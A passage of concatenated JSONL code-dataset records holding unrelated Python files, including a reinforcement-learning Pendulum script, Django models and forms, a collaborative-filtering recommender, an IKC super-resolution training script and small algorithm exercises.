%H:%M:%S',time.localtime()))\n\n\"\"\"\nstock_no\ndividend_year\ncash_div_surplus\ncash_div_reserve\ntotal_cash_div\nstock_div_surplus\nstock_div_reserve\ntotal_stock_div\ntotal_dividend\ntotal_div_cash\ntotal_div_stocks\ndays_fill_cash\ndays_fill_stocks\nstock_price_year\nyear_high_price\nyear_low_price\nyear_avg_price\navg_ann_cash_yield\navg_ann_stock_yield\navg_ann_yield\nperiod_of_dividend\neps\ndiv_earnings_dis_ratio\nalo_earnings_dis_ratio\nearnings_dis_ratio\n\"\"\"","sub_path":"myStocksPGMs4unix/V2.0/PolarisDataToDat/FormatStocksSaleMonData.py","file_name":"FormatStocksSaleMonData.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"143715298","text":"import os\n\ndef driver():\n for root, subdir, files in os.walk(os.getcwd()):\n if '.git' in root:\n continue\n\n for fn in files:\n fp = os.path.join(root, fn)\n\n with file(fp) as f:\n content = f.read()\n content = content.replace('\\r', '')\n with file(fp, 'wb') as f:\n f.write(content)\n\nif __name__ == '__main__':\n driver()\n","sub_path":"fix_newline_windows.py","file_name":"fix_newline_windows.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"587055113","text":"#!/usr/bin/env python\n\"\"\"\nNaive approach to Pendulum-v0.\nState space is digitized to allow learning with a standard tabular Q-Learner.\n\"\"\"\n\nimport gym\nimport numpy as np\nfrom agents.TabularQLearner import TabularQLearner\n\nif __name__ == '__main__':\n ## Setup gym\n env = gym.make('Pendulum-v0')\n\n ## Tabular Q Learner Setup\n costheta_bins = np.arange(-1.0, 1.2, 0.2)\n sintheta_bins = np.arange(-1.0, 1.2, 0.2)\n theta_dot_bins = np.arange(-8.0, 8.8, 0.8)\n\n state_bins = [costheta_bins, sintheta_bins, theta_dot_bins]\n action_bins = np.arange(-2.0, 2.2, 0.2)\n\n TQL = TabularQLearner(state_bins, action_bins, action_type=str(env.action_space), init_vals=0, plotting=True, plot_params=[-2000, 0, 0, 1])\n TQL.set_gamma(1.0)\n\n episodes = 0\n check_interval = 5000\n\n while True:\n env.reset()\n state_observation = None\n next_state_observation = None\n inspection_run = False\n\n for t in range(1000): # episode stops after 200 iterations when done signal is returned below\n\n if episodes % check_interval == 0:\n inspection_run = True\n env.render()\n else:\n inspection_run = False\n\n if inspection_run:\n epsilon = 0.0\n env.render()\n else:\n epsilon = max(0.01, min(0.5, 1 / (episodes * 1e-2)))\n\n TQL.set_epsilon(epsilon)\n action = TQL.get_action(state_observation) # returns random action if no observation passed\n\n next_state_observation, reward, done, info = env.step(action)\n\n if state_observation is not None and next_state_observation is not None and not inspection_run:\n alpha = max(0.01, min(0.3, 1 / (episodes * 1e-2)))\n TQL.set_alpha(alpha)\n TQL.update_q(next_state_observation, state_observation, action, reward)\n\n if done:\n TQL.update_plot_data()\n if inspection_run:\n print(\"Episode finished after {} timesteps, episode {}\".format(t + 1, episodes))\n TQL.update_plot(episodes)\n break\n\n state_observation = next_state_observation\n\n episodes = episodes + 1\n","sub_path":"Classic control/Pendulum-v0.py","file_name":"Pendulum-v0.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"342432079","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom ..LogReg.models import *\n# Create your models here.\nclass CourseManager(models.Manager):\n def basic_validator(self, postData):\n erros = {}\n if len(postData['name']) < 5:\n erros['name'] = \"Course name should be more than 5 characters\"\n if len(postData['Description']) < 15:\n erros['Description'] = \"Course description should be more than 15 characters\"\n return erros\nclass Course(models.Model):\n name = models.CharField(max_length=255)\n Description = models.TextField()\n created_at = models.DateTimeField(auto_now_add = True)\n user = models.ForeignKey(User, related_name = \"courses\")\n joined = models.ManyToManyField(User, related_name =\"joined_courses\")\n\n objects = CourseManager()\n","sub_path":"Django/Courses/apps/CourseFrame/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"400916490","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 25 15:04:05 2018\n\n@author: Aditya\n\"\"\"\n\nMAX_COL = 6\nMAX_ROW = 6\nN_IMAGES = MAX_COL * MAX_ROW\nIMAGE_SIZE = 2.15\nGAP_LD = 0.085\nGAP_HD = 0.85\nLINEAR_REWARD = [-1, 0, 4, 7, 10, 13]\nPOWER_REWARD = [-1, 0, 2, 3, 6, 20]\n\nLINEAR_REWARD_TEST = [-1, 0, 40, 70, 100, 130]\nPOWER_REWARD_TEST = [-1, 0, 20, 30, 60, 200]\n\n\nMAX_ACTIONS = N_IMAGES + 1\nCLICK_ACTION = N_IMAGES\nMAX_STEPS = 15\n\n#Properties\nHIGH_DENSITY = False\nLOW_DENSITY = True\nPOWER_FUNCTION = False\nLINEAR_FUNCTION = True\n\nHIGH_LINEAR_TIME = 0.325\nLOW_LINEAR_TIME = 0.310\nHIGH_POWER_TIME = 0.350\nLOW_POWER_TIME = 0.330","sub_path":"GlobalConstants.py","file_name":"GlobalConstants.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"206376171","text":"# coding:UTF-8\n# 2018-10-18\n# Collaborative Filtering\n\nimport numpy as np \n\ndef loadData(file_path):\n \"\"\"\n 加载数据,数据为矩阵\n \"\"\"\n f = open(file_path) \n data = []\n for line in f.readlines():\n lines = line.strip().split(\"\\t\")\n tmp = []\n for x in lines:\n if x != \"-\":\n tmp.append(float(x))\n else:\n # 未进行打分\n tmp.append(0)\n data.append(tmp)\n f.close()\n \n return np.mat(data)\n\n\ndef cosSimilary(x, y):\n \"\"\"\n 余弦相似度\n \"\"\"\n numerator = x * y.T \n denominator = np.sqrt(x * x.T) * np.sqrt(y * y.T)\n cos_sim = numerator / denominator\n return cos_sim[0, 0]\n\n\ndef similarity(data):\n \"\"\"\n 计算矩阵中任意两行之间的相似度\n \"\"\"\n m = np.shape(data)[0]\n w = np.mat(np.zeros((m, m))) # 相似度矩阵\n for i in range(m):\n for j in range(m):\n if i != j:\n w[i, j] = cosSimilary(data[i, :], data[j, :])\n w[j, i] = w[i, j]\n else:\n w[i, j] = 0 # 自己和自己的相似度为0\n\n return w \n\n\ndef userBasedRecommend(data, w, user):\n \"\"\"\n 基于用户相似度为用户推荐商品\n 此时的data: 用户-商品矩阵\n a. 选出该用户没有标记过的商品\n b. 根据相似度对没有标记的商品进行打分\n c. 对结果进行排序\n \"\"\"\n m, n = np.shape(data)\n interaction = data[user, :]\n\n # a. 选出该用户没有标记过的商品\n not_inter = []\n for i in range(n):\n if interaction[0, i] == 0:\n not_inter.append(i)\n\n # b. 根据相似度对没有标记的商品进行打分\n predict = {}\n for x in not_inter:\n item = np.copy(data[:, x]) # 所有用户对该商品的打分\n for i in range(m):\n if item[i, 0] != 0:\n if x not in predict:\n predict[x] = w[user, i] * item[i, 0] # 该用户与其他用户对于商��i的相似度\n else:\n predict[x] += w[user, i] * item[i, 0]\n\n sort_predict = sorted(predict.items(), key=lambda d:d[1], reverse=True)\n\n return sort_predict\n\n\ndef itemBasedRecommend(data, w, user):\n \"\"\"\n 基于商品为用户user推荐商品\n 此时的data为 : 商品-用户矩阵\n \"\"\"\n m, n = np.shape(data)\n interaction = data[:, user].T\n\n # a. 选出该用户没有标记过的商品\n not_inter = []\n for i in range(n):\n if interaction[0, i] == 0:\n not_inter.append(i)\n\n # b. 根据相似度对没有标记的商品进行打分\n predict = {}\n for x in not_inter:\n item = np.copy(interaction) # 获取用户user对商品的互动信息\n for j in range(m): # 对每一个商品\n if item[0, j] != 0: # 利用互动过的商品预测\n if x not in predict:\n predict[x] = w[x, j] * item[0, j]\n else:\n predict[x] = predict[x] + w[x, j] * item[0, j]\n\n sort_predict = sorted(predict.items(), key=lambda d:d[1], reverse=True)\n\n return sort_predict\n\n\ndef topK(predict, k):\n \"\"\"\n 为用户推荐前K个商品\n \"\"\"\n top_recommend = []\n len_predict = len(predict)\n if k >= len_predict:\n top_recommend = predict\n else:\n top_recommend = predict[ : k]\n return top_recommend\n\n\nif __name__ == '__main__':\n print(\"loading data...\")\n data_file = \"data.txt\"\n data = loadData(data_file)\n\n # 基于项的协同过滤数据处理\n # data = data.T\n\n print(\"calculate similarity between items...\")\n w = similarity(data)\n\n print(\"predicting...\")\n predict = userBasedRecommend(data, w, 0)\n\n print(\"top k recommend\")\n top = topK(predict, 2)\n print(top)","sub_path":"MachineLearning/Collaborative Filtering/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"302279195","text":"from factory import Sequence, LazyAttribute\nfrom factory.alchemy import SQLAlchemyModelFactory\n\nfrom skybb.core import db\nfrom skybb.models import *\nfrom skybb.users.utils import hash_string\n\nclass SkybbSQLAlchemyModelFactory(SQLAlchemyModelFactory):\n ABSTRACT_FACTORY = True\n\n @classmethod\n def _create(cls, target_class, *args, **kwargs):\n obj = super(SkybbSQLAlchemyModelFactory, cls)._create(target_class,\n *args, **kwargs)\n session = cls.FACTORY_SESSION\n session.commit()\n session.refresh(obj)\n return obj\n\nclass UserFactory(SkybbSQLAlchemyModelFactory):\n FACTORY_FOR = User\n FACTORY_SESSION = db.session\n email = Sequence(lambda n: 'user%d@email.com' % n)\n password = LazyAttribute(lambda a: hash_string('password'))\n username = Sequence(lambda n: 'user%d' % n)\n\ndef create_forum(name='name'):\n from skybb.forums.models import Forum\n f = Forum(name)\n db.session.add(f)\n db.session.commit()\n db.session.refresh(f)\n return f\n\ndef create_topic(title='title', body='body', user=None, forum=None):\n from skybb.forums.controllers import create_topic\n if not user:\n user = UserFactory()\n if not forum:\n forum = create_forum()\n p, t = create_topic(forum, user, title, body)\n db.session.add(p)\n db.session.add(t)\n db.session.commit()\n db.session.refresh(p)\n db.session.refresh(t)\n return p, t, forum, user\n\ndef create_post(title='title', body='body', user=None, topic=None):\n from skybb.forums.controllers import reply_to_topic\n if not topic:\n _, topic, forum, user = create_topic(user=user)\n else:\n forum = topic.forum\n if not user:\n user = UserFactory()\n p = reply_to_topic(topic, user, title, body)\n db.session.add(p)\n db.session.commit()\n db.session.refresh(p)\n return p, topic, forum, user\n","sub_path":"tests/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"65774455","text":"import argparse\nimport logging\nimport math\nimport os\nimport random\n\nimport numpy as np\nimport torch\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\n\nimport options as option\nfrom data import create_dataloader, create_dataset\nfrom data.data_sampler import DistIterSampler\nfrom models import create_model\nfrom utils import util\n\n\ndef init_dist(backend=\"nccl\", **kwargs):\n \"\"\" initialization for distributed training\"\"\"\n # if mp.get_start_method(allow_none=True) is None:\n if (\n mp.get_start_method(allow_none=True) != \"spawn\"\n ): # Return the name of start method used for starting processes\n mp.set_start_method(\"spawn\", force=True) ##'spawn' is the default on Windows\n rank = int(os.environ[\"RANK\"]) # system env process ranks\n num_gpus = torch.cuda.device_count() # Returns the number of GPUs available\n torch.cuda.set_device(rank % num_gpus)\n dist.init_process_group(\n backend=backend, **kwargs\n ) # Initializes the default distributed process group\n\n\ndef main():\n #### setup options of three networks\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-opt_P\",\n type=str,\n default=\"options/train/Predictor/train_Predictor_x4.yml\",\n help=\"Path to option YMAL file of Predictor.\",\n )\n parser.add_argument(\n \"-opt_C\",\n type=str,\n default=\"options/train/Corrector/train_Corrector_x4.yml\",\n help=\"Path to option YMAL file of Corrector.\",\n )\n parser.add_argument(\n \"-opt_F\",\n type=str,\n default=\"options/test/SFTMD/test_SFTMD_x4.yml\",\n help=\"Path to option YMAL file of SFTMD_Net.\",\n )\n parser.add_argument(\n \"--launcher\", choices=[\"none\", \"pytorch\"], default=\"none\", help=\"job launcher\"\n )\n parser.add_argument(\"--local_rank\", type=int, default=0)\n args = parser.parse_args()\n opt_P = option.parse(args.opt_P, is_train=True)\n opt_C = option.parse(args.opt_C, is_train=True)\n opt_F = option.parse(args.opt_F, is_train=False)\n\n # convert to NoneDict, which returns None for missing keys\n opt_P = option.dict_to_nonedict(opt_P)\n opt_C = option.dict_to_nonedict(opt_C)\n opt_F = option.dict_to_nonedict(opt_F)\n\n #### set random seed\n seed = opt_P[\"train\"][\"manual_seed\"]\n if seed is None:\n seed = random.randint(1, 10000)\n util.set_random_seed(seed)\n\n # load PCA matrix of enough kernel\n print(\"load PCA matrix\")\n pca_matrix = torch.load(\n \"../../../pca_matrix/IKC/pca_matrix.pth\",\n map_location=lambda storage, loc: storage,\n )\n print(\"PCA matrix shape: {}\".format(pca_matrix.shape))\n\n #### distributed training settings\n if args.launcher == \"none\": # disabled distributed training\n opt_P[\"dist\"] = False\n opt_C[\"dist\"] = False\n rank = -1\n print(\"Disabled distributed training.\")\n else:\n opt_P[\"dist\"] = True\n opt_C[\"dist\"] = True\n init_dist()\n world_size = (\n torch.distributed.get_world_size()\n ) # Returns the number of processes in the current process group\n rank = torch.distributed.get_rank() # Returns the rank of current process group\n\n torch.backends.cudnn.benchmark = True\n # torch.backends.cudnn.deterministic = True\n\n ###### Predictor&Corrector train ######\n\n #### loading resume state if exists\n if opt_P[\"path\"].get(\"resume_state\", None):\n # distributed resuming: all load into default GPU\n device_id = torch.cuda.current_device()\n resume_state = torch.load(\n opt_P[\"path\"][\"resume_state\"],\n map_location=lambda storage, loc: storage.cuda(device_id),\n )\n option.check_resume(opt_P, resume_state[\"iter\"]) # check resume options\n else:\n resume_state = None\n\n #### mkdir and loggers\n if rank <= 0: # normal training (rank -1) OR distributed training (rank 0-7)\n if resume_state is None:\n # Predictor path\n util.mkdir_and_rename(\n opt_P[\"path\"][\"experiments_root\"]\n ) # rename experiment folder if exists\n util.mkdirs(\n (\n path\n for key, path in opt_P[\"path\"].items()\n if not key == \"experiments_root\"\n and \"pretrain_model\" not in key\n and \"resume\" not in key\n )\n )\n # Corrector path\n util.mkdir_and_rename(\n opt_C[\"path\"][\"experiments_root\"]\n ) # rename experiment folder if exists\n util.mkdirs(\n (\n path\n for key, path in opt_C[\"path\"].items()\n if not key == \"experiments_root\"\n and \"pretrain_model\" not in key\n and \"resume\" not in key\n )\n )\n\n os.system(\"rm ./log\")\n os.symlink(os.path.join(opt_P[\"path\"][\"experiments_root\"], \"..\"), \"./log\")\n\n # config loggers. Before it, the log will not work\n util.setup_logger(\n \"base\",\n opt_P[\"path\"][\"log\"],\n \"train_\" + opt_P[\"name\"],\n level=logging.INFO,\n screen=True,\n tofile=True,\n )\n util.setup_logger(\n \"val\",\n opt_P[\"path\"][\"log\"],\n \"val_\" + opt_P[\"name\"],\n level=logging.INFO,\n screen=True,\n tofile=True,\n )\n logger = logging.getLogger(\"base\")\n logger.info(option.dict2str(opt_P))\n logger.info(option.dict2str(opt_C))\n # tensorboard logger\n if opt_P[\"use_tb_logger\"] and \"debug\" not in opt_P[\"name\"]:\n version = float(torch.__version__[0:3])\n if version >= 1.1: # PyTorch 1.1\n from torch.utils.tensorboard import SummaryWriter\n else:\n logger.info(\n \"You are using PyTorch {}. Tensorboard will use [tensorboardX]\".format(\n version\n )\n )\n from tensorboardX import SummaryWriter\n tb_logger = SummaryWriter(log_dir=\"log/{}/tb_logger/\".format(opt_P[\"name\"]))\n else:\n util.setup_logger(\n \"base\", opt_P[\"path\"][\"log\"], \"train\", level=logging.INFO, screen=True\n )\n logger = logging.getLogger(\"base\")\n\n torch.backends.cudnn.benchmark = True\n # torch.backends.cudnn.deterministic = True\n\n #### create train and val dataloader\n dataset_ratio = 200 # enlarge the size of each epoch\n for phase, dataset_opt in opt_P[\"datasets\"].items():\n if phase == \"train\":\n train_set = create_dataset(dataset_opt)\n train_size = int(math.ceil(len(train_set) / dataset_opt[\"batch_size\"]))\n total_iters = int(opt_P[\"train\"][\"niter\"])\n total_epochs = int(math.ceil(total_iters / train_size))\n if opt_P[\"dist\"]:\n train_sampler = DistIterSampler(\n train_set, world_size, rank, dataset_ratio\n )\n total_epochs = int(\n math.ceil(total_iters / (train_size * dataset_ratio))\n )\n else:\n train_sampler = None\n train_loader = create_dataloader(\n train_set, dataset_opt, opt_P, train_sampler\n )\n if rank <= 0:\n logger.info(\n \"Number of train images: {:,d}, iters: {:,d}\".format(\n len(train_set), train_size\n )\n )\n logger.info(\n \"Total epochs needed: {:d} for iters {:,d}\".format(\n total_epochs, total_iters\n )\n )\n elif phase == \"val\":\n val_set = create_dataset(dataset_opt)\n val_loader = create_dataloader(val_set, dataset_opt, opt_P, None)\n if rank <= 0:\n logger.info(\n \"Number of val images in [{:s}]: {:d}\".format(\n dataset_opt[\"name\"], len(val_set)\n )\n )\n else:\n raise NotImplementedError(\"Phase [{:s}] is not recognized.\".format(phase))\n assert train_loader is not None\n assert val_loader is not None\n\n #### create model\n model_F = create_model(opt_F) # load pretrained model of SFTMD\n model_P = create_model(opt_P)\n model_C = create_model(opt_C)\n\n #### resume training\n if resume_state:\n logger.info(\n \"Resuming training from epoch: {}, iter: {}.\".format(\n resume_state[\"epoch\"], resume_state[\"iter\"]\n )\n )\n\n start_epoch = resume_state[\"epoch\"]\n current_step = resume_state[\"iter\"]\n model_P.resume_training(resume_state) # handle optimizers and schedulers\n else:\n current_step = 0\n start_epoch = 0\n\n #### training\n logger.info(\n \"Start training from epoch: {:d}, iter: {:d}\".format(start_epoch, current_step)\n )\n for epoch in range(start_epoch, total_epochs + 1):\n if opt_P[\"dist\"]:\n train_sampler.set_epoch(epoch)\n for _, train_data in enumerate(train_loader):\n current_step += 1\n if current_step > total_iters:\n break\n #### update learning rate, schedulers\n # model.update_learning_rate(current_step, warmup_iter=opt_P['train']['warmup_iter'])\n\n #### preprocessing for LR_img and kernel map\n prepro = util.SRMDPreprocessing(\n opt_P[\"scale\"],\n pca_matrix,\n random=True,\n para_input=opt_P[\"code_length\"],\n kernel=opt_P[\"kernel_size\"],\n noise=False,\n cuda=True,\n sig=opt_P[\"sig\"],\n sig_min=opt_P[\"sig_min\"],\n sig_max=opt_P[\"sig_max\"],\n rate_iso=1.0,\n scaling=3,\n rate_cln=0.2,\n noise_high=0.0,\n )\n LR_img, ker_map = prepro(train_data[\"GT\"])\n\n #### training Predictor\n model_P.feed_data(LR_img, ker_map)\n model_P.optimize_parameters(current_step)\n P_visuals = model_P.get_current_visuals()\n est_ker_map = P_visuals[\"Batch_est_ker_map\"]\n\n #### log of model_P\n if current_step % opt_P[\"logger\"][\"print_freq\"] == 0:\n logs = model_P.get_current_log()\n message = \"Predictor \".format(\n epoch, current_step, model_P.get_current_learning_rate()\n )\n for k, v in logs.items():\n message += \"{:s}: {:.4e} \".format(k, v)\n # tensorboard logger\n if opt_P[\"use_tb_logger\"] and \"debug\" not in opt_P[\"name\"]:\n if rank <= 0:\n tb_logger.add_scalar(k, v, current_step)\n if rank <= 0:\n logger.info(message)\n\n #### training Corrector\n for step in range(opt_C[\"step\"]):\n # test SFTMD for corresponding SR image\n model_F.feed_data(train_data, LR_img, est_ker_map)\n model_F.test()\n F_visuals = model_F.get_current_visuals()\n SR_img = F_visuals[\"Batch_SR\"]\n # Test SFTMD to produce SR images\n\n # train corrector given SR image and estimated kernel map\n model_C.feed_data(SR_img, est_ker_map, ker_map)\n model_C.optimize_parameters(current_step)\n C_visuals = model_C.get_current_visuals()\n est_ker_map = C_visuals[\"Batch_est_ker_map\"]\n\n #### log of model_C\n if current_step % opt_C[\"logger\"][\"print_freq\"] == 0:\n logs = model_C.get_current_log()\n message = \"Corrector \".format(\n epoch, current_step, model_C.get_current_learning_rate()\n )\n for k, v in logs.items():\n message += \"{:s}: {:.4e} \".format(k, v)\n # tensorboard logger\n if opt_C[\"use_tb_logger\"] and \"debug\" not in opt_C[\"name\"]:\n if rank <= 0:\n tb_logger.add_scalar(k, v, current_step)\n if rank <= 0:\n logger.info(message)\n\n # validation, to produce ker_map_list(fake)\n if current_step % opt_P[\"train\"][\"val_freq\"] == 0 and rank <= 0:\n avg_psnr = 0.0\n idx = 0\n for _, val_data in enumerate(val_loader):\n prepro = util.SRMDPreprocessing(\n opt_P[\"scale\"],\n pca_matrix,\n random=True,\n para_input=opt_P[\"code_length\"],\n kernel=opt_P[\"kernel_size\"],\n noise=False,\n cuda=True,\n sig=opt_P[\"sig\"],\n sig_min=opt_P[\"sig_min\"],\n sig_max=opt_P[\"sig_max\"],\n rate_iso=1.0,\n scaling=3,\n rate_cln=0.2,\n noise_high=0.0,\n )\n LR_img, ker_map = prepro(val_data[\"GT\"])\n single_img_psnr = 0.0\n lr_img = util.tensor2img(LR_img) # save LR image for reference\n\n # valid Predictor\n model_P.feed_data(LR_img, ker_map)\n model_P.test()\n P_visuals = model_P.get_current_visuals()\n est_ker_map = P_visuals[\"Batch_est_ker_map\"]\n\n # Save images for reference\n img_name = os.path.splitext(\n os.path.basename(val_data[\"LQ_path\"][0])\n )[0]\n img_dir = os.path.join(opt_P[\"path\"][\"val_images\"], img_name)\n # img_dir = os.path.join(opt_F['path']['val_images'], str(current_step), '_', str(step))\n util.mkdir(img_dir)\n save_lr_path = os.path.join(img_dir, \"{:s}_LR.png\".format(img_name))\n util.save_img(lr_img, save_lr_path)\n\n for step in range(opt_C[\"step\"]):\n step += 1\n idx += 1\n model_F.feed_data(val_data, LR_img, est_ker_map)\n model_F.test()\n F_visuals = model_F.get_current_visuals()\n SR_img = F_visuals[\"Batch_SR\"]\n # Test SFTMD to produce SR images\n\n model_C.feed_data(SR_img, est_ker_map, ker_map)\n model_C.test()\n C_visuals = model_C.get_current_visuals()\n est_ker_map = C_visuals[\"Batch_est_ker_map\"]\n\n sr_img = util.tensor2img(F_visuals[\"SR\"]) # uint8\n gt_img = util.tensor2img(F_visuals[\"GT\"]) # uint8\n\n save_img_path = os.path.join(\n img_dir,\n \"{:s}_{:d}_{:d}.png\".format(img_name, current_step, step),\n )\n util.save_img(sr_img, save_img_path)\n\n # calculate PSNR\n crop_size = opt_P[\"scale\"]\n gt_img = gt_img / 255.0\n sr_img = sr_img / 255.0\n cropped_sr_img = sr_img[\n crop_size:-crop_size, crop_size:-crop_size, :\n ]\n cropped_gt_img = gt_img[\n crop_size:-crop_size, crop_size:-crop_size, :\n ]\n step_psnr = util.calculate_psnr(\n cropped_sr_img * 255, cropped_gt_img * 255\n )\n logger.info(\n \" img:{:s}, psnr: {:.6f}\".format(\n epoch, current_step, step, img_name, step_psnr\n )\n )\n single_img_psnr += step_psnr\n avg_psnr += util.calculate_psnr(\n cropped_sr_img * 255, cropped_gt_img * 255\n )\n\n avg_signle_img_psnr = single_img_psnr / step\n logger.info(\n \" img:{:s}, average psnr: {:.6f}\".format(\n epoch, current_step, step, img_name, avg_signle_img_psnr\n )\n )\n\n avg_psnr = avg_psnr / idx\n\n # log\n logger.info(\"# Validation # PSNR: {:.6f}\".format(avg_psnr))\n logger_val = logging.getLogger(\"val\") # validation logger\n logger_val.info(\n \" psnr: {:.6f}\".format(\n epoch, current_step, step, avg_psnr\n )\n )\n # tensorboard logger\n if opt_P[\"use_tb_logger\"] and \"debug\" not in opt_P[\"name\"]:\n tb_logger.add_scalar(\"psnr\", avg_psnr, current_step)\n\n #### save models and training states\n if current_step % opt_P[\"logger\"][\"save_checkpoint_freq\"] == 0:\n if rank <= 0:\n logger.info(\"Saving models and training states.\")\n model_P.save(current_step)\n model_P.save_training_state(epoch, current_step)\n model_C.save(current_step)\n model_C.save_training_state(epoch, current_step)\n\n if rank <= 0:\n logger.info(\"Saving the final model.\")\n model_P.save(\"latest\")\n model_C.save(\"latest\")\n logger.info(\"End of Predictor and Corrector training.\")\n tb_logger.close()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"codes/config/IKC/train_IKC.py","file_name":"train_IKC.py","file_ext":"py","file_size_in_byte":18445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"522751538","text":"import math\ndef solution(n, stations, w):\n answer = 0\n start = 1\n for station in stations:\n l = station - w - start\n e = w * 2 + 1\n answer += math.ceil(l / e)\n start = station + w + 1\n if start <= n:\n answer += math.ceil((n - start + 1) / e)\n return answer\n\nprint(solution(11, [4, 11], 1))\nprint(solution(16, [9], 2))\n\n# import math\n# def solution(n, stations, w):\n# answer = 0\n# mini = [0] * n\n# for station in stations:\n# mini[station - (w + 1):station + w] = [1]\n# houses = list(''.join(map(str, mini)).split('1'))\n# for house in houses:\n# if house:\n# l = len(house)\n# e = w * 2 + 1\n# if l <= e:\n# answer += 1\n# else:\n# answer += math.ceil(l / e)\n# return answer","sub_path":"Python/Programmers/2018SWC/L3_기지국설치.py","file_name":"L3_기지국설치.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"30244570","text":"import math\ndef isPrime(n):\n if(n < 2):\n return False\n if(n == 2):\n return True\n p = int(math.sqrt(n)) + 1\n for z in range(2, p):\n if(n % z == 0):\n return False\n return True\n\ndef insertAsc(a, i, x):\n j = i\n while(i > 0):\n if not isPrime(a[i - 1]):\n t = a[i - 1]\n if(t > x):\n a[j] = t\n a[i - 1] = x\n j = i - 1\n i -= 1\ndef solution():\n n = int(input())\n a = list(map(int, input().split()))\n if(n == 1):\n print(a[0])\n return\n m = 1\n while(m < n):\n x = a[m]\n if(isPrime(x)):\n m += 1\n continue\n insertAsc(a, m, x)\n m += 1\n for y in range(len(a)):\n if(y == len(a) - 1):\n print(a[y])\n else:\n print(a[y], end = \" \")\n\nsolution()","sub_path":"Sort/bt3.py","file_name":"bt3.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"314851409","text":"# _*_ coding: utf-8 _*_\n__author__ = 'HeYang'\n\nfrom django import forms\nfrom django.forms import ValidationError\nfrom django.forms import widgets\n\nfrom managerbook.models import *\n\n\nclass AuthorForm(forms.Form):\n\n name = forms.CharField(\n max_length=32,\n widget=widgets.TextInput(\n attrs={\"type\": \"text\", \"placeholder\": \"作者名\", \"class\": \"form-control\", 'id': \"author_name\", }\n )\n )\n\n address = forms.CharField(\n max_length=32,\n widget=widgets.TextInput(\n attrs={\"type\": \"text\", \"placeholder\": \"居住地\", \"class\": \"form-control\", 'id': \"author_address\", }\n )\n )\n\n phone = forms.IntegerField(\n widget=widgets.TextInput(\n attrs={\"type\": \"text\", \"placeholder\": \"手机号\", \"class\": \"form-control\", 'id': \"author_phone\", }\n )\n )\n\n email = forms.EmailField(\n widget=widgets.TextInput(\n attrs={\"type\": \"text\", \"placeholder\": \"Email\", \"class\": \"form-control\", 'id': \"author_email\", }\n )\n )\n\n authorinfo = forms.CharField(\n widget=widgets.Textarea(\n attrs={\"rows\": 8, \"class\": \"form-control\", \"id\": \"demo-textarea-input-author\", \"placeholder\": \"简介\", }\n )\n )","sub_path":"managerauthor/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"291681563","text":"#Ejercicios en Python - Semana 2\n\n#1.\tLeer un número entero y determinar si es un número terminado en 4\n\nnumero=int(input(\"Ingrese número para evaluar si termina en 4: \")) #Entrada de teclado de número a evaluar\ncadena=str(numero)\nc=len(cadena)\nprint(\"El número ingresado tiene: \"+str(c)+\" dígitos\")\n\nultimo=cadena[c-1]\nprint(\"El último digito del número ingresado es: \"+ultimo)\n\nif ultimo==\"4\":\n print(\"El número: \"+cadena+\" termina en 4\")\nelse:\n print(\"El número: \"+cadena+\" no termina en 4\")\n\n\n#2.\tLeer un número entero y determinar si tiene 3 dígitos.\nnum=int(input(\"Ingrese un número entero de tres dígitos: \"))\ncad=str(num)\nlon=len(cad)\n\nif lon==\"3\":\n print(\"El número ingresado tiene tres dígitos\")\nelse:\n print(\"Intente de nuevo, el número NO tiene tres dígitos\")\n\n","sub_path":"Ejercicios en Python - Semana 2.py","file_name":"Ejercicios en Python - Semana 2.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"591155945","text":"norm_cut = 10000\nfrom modules.histCollection import HistCollection\nfrom modules.histCollection import HistCleaner\nclass DQMPCA(object):\n \"\"\"Class to perform PCA specifically on HistCollection objects\"\"\"\n import numpy as np\n def __init__(self, use_standard_scaler=False, norm_cut=norm_cut, sse_ncomps=None):\n \"\"\"Initialize the DQMPCA\n\n -use_standard_scalar determines whether to use standard scaling\n (zero mean, unit stdev) before feeding into a PCA. This helps\n for some histograms, but hurts for others\n \"\"\"\n if use_standard_scaler:\n self.pca = Pipeline(\n (\"scaler\", StandardScaler()),\n (\"pca\", PCA())\n )\n else:\n self.pca = PCA()\n\n self.use_standard_scaler = use_standard_scaler\n self.norm_cut = norm_cut\n self.sse_ncomps = sse_ncomps\n\n self.__is_fit = False\n\n @property\n def sse_ncomps(self):\n return self.__sse_ncomps\n\n @sse_ncomps.setter\n def sse_ncomps(self, sse):\n if sse is not None and not isinstance(sse, tuple) and not isinstance(sse, list):\n raise Exception(\"illigal sse_ncomps value. Should be None or a list/tuple of ints\")\n self.__sse_ncomps = sse\n\n def _check_fit(self):\n if not 